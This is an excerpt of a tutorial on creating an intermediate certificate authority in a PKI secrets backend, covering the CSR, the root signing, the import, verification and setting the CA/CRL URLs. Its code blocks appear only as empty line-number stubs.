Fix the URL for accessing the CA/CRL URLs
1 2 |
|
Mount the PKI for the Intermediate (similar to root)
1 2 3 4 5 6 7 8 |
|
Generate the intermediate CSR
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
|
Cut and paste that CSR into a new file cuddletech_ops.csr. The reason we output the file here is so we can get it out of one backend and into another and then back out.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
|
Now that we have a Root CA signed cert, we’ll need to cut-n-paste this certificate into a file we’ll name cuddletech_ops.crt and then import it into our Intermediate CA backend:
1 2 3 |
|
Awesome! Lets verify:
1 2 3 4 5 6 7 8 9 10 11 12 13 |
|
The last thing we need to do is set the CA & CRL URL’s for accessing the CA:
1 2 3 4 |
|